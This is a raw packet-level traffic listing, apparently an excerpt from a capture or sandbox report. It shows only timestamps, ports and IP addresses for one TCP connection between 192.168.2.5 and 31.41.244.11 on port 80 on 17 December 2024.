Dec 17, 2024 06:03:41.766714096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.767637014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.767684937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.767754078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.767796993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.768691063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.768735886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.768800974 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.768846989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.769728899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.769777060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.769857883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.769901991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.770768881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.770813942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.770884991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.770929098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.771874905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.771923065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.771955013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.772001028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.772908926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.772954941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.773036957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.773083925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.773962021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.774008036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.774074078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.774118900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.775343895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.775363922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.775414944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.776074886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.776123047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.776175022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.776220083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.777192116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.777242899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.777254105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.777282953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.778211117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.778265953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.778352022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.778400898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.779268026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.779320002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.779354095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.779396057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.780329943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.780383110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.780464888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.780507088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.781461000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.781488895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.781512976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.781523943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.782501936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.782547951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.782591105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.782635927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.783565998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.783615112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.783620119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.783660889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.784555912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.784600973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.784826040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.784868002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.785775900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.785794020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.785834074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.785844088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.786704063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.786750078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.786818981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.786859989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.787870884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.787889957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.787911892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.787925959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.788839102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.788881063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.788883924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.788921118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.789910078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.789963007 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.789995909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.790044069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.791332006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.791347027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.791382074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.791394949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.792403936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.792418957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.792449951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.792463064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.793040037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.793083906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.793152094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.793210983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.794131994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.794179916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.794198990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.794243097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.795165062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.795207977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.795358896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.795402050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.796227932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.796271086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.796339989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.796387911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.797292948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.797338963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.797408104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.797456026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.798386097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.798449039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.798463106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.798505068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.799402952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.799446106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.799515963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.799557924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.800570965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.800589085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.800615072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.800626993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.801604986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.801650047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.801656008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.801697969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.802609921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.802654982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.802680016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.802721977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.803633928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.803678036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.803756952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.803800106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.804769039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.804786921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.804816008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.804826975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.805829048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.805872917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.805892944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.805933952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.806910992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.806929111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.806953907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.806968927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.807952881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.807997942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.808020115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.808062077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.808995962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.809056044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.809071064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.809114933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.810149908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.810168982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.810210943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.810223103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.811145067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.811193943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.811199903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.811230898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.812283039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.812299013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.812347889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.813220024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.813266993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.813388109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.813432932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.814284086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.814327955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.814364910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.814407110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.815254927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.815320015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.951996088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.952112913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.952368975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.952418089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.952441931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.952486992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.952538013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.952581882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.953502893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.953547955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.953630924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.953677893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.954566956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.954611063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.954749107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.954792023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.955636024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.955678940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.955718994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.955763102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.956679106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.956722021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.956880093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.956927061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.957792044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.957834005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.957901001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.957945108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.958839893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.958884954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.958970070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.959014893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.959877968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.959947109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.959973097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.960015059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.960972071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.961018085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.961044073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.961083889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.962007999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.962053061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.962141037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.962177038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.963077068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.963120937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.963206053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.963246107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.964159966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.964202881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.964246035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.964289904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.965234995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.965277910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.965301991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.965338945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.966283083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.966327906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.966366053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.966406107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.967407942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.967431068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.967452049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.967464924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.968359947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.968400955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.968513966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.968552113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.969491005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.969532013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.969685078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.969728947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.970515013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.970581055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.970618010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.970660925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.971592903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.971638918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.971683025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.971725941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.972687960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.972733974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.972754002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.972795963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.973803043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.973825932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.973845005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.973860025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.974957943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.974980116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.975001097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.975012064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.975840092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.975883007 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.975902081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.975945950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.976824045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.976861954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.976929903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.976973057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.977982044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.978024960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.978063107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.978106976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.979126930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.979146004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.979170084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.979192019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.980070114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.980112076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.980154037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.980191946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.981085062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.981144905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.981184006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.981228113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.982218027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.982264042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.982533932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.982577085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.983305931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.983333111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.983347893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.983372927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.984365940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.984410048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.984438896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.984482050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.985327005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.985373020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.985410929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.985455036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.986361980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.986407042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.986448050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.986489058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.987525940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.987545013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.987571001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.987581968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.988549948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.988595963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.988626003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.988668919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.989603043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.989644051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.989706993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.989749908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.990801096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.990820885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.990845919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.990864992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.991691113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.991750002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.991849899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.991894960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.992763996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.992810011 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.992844105 CET	80	49902	31.41.244.11	192.168.2.5
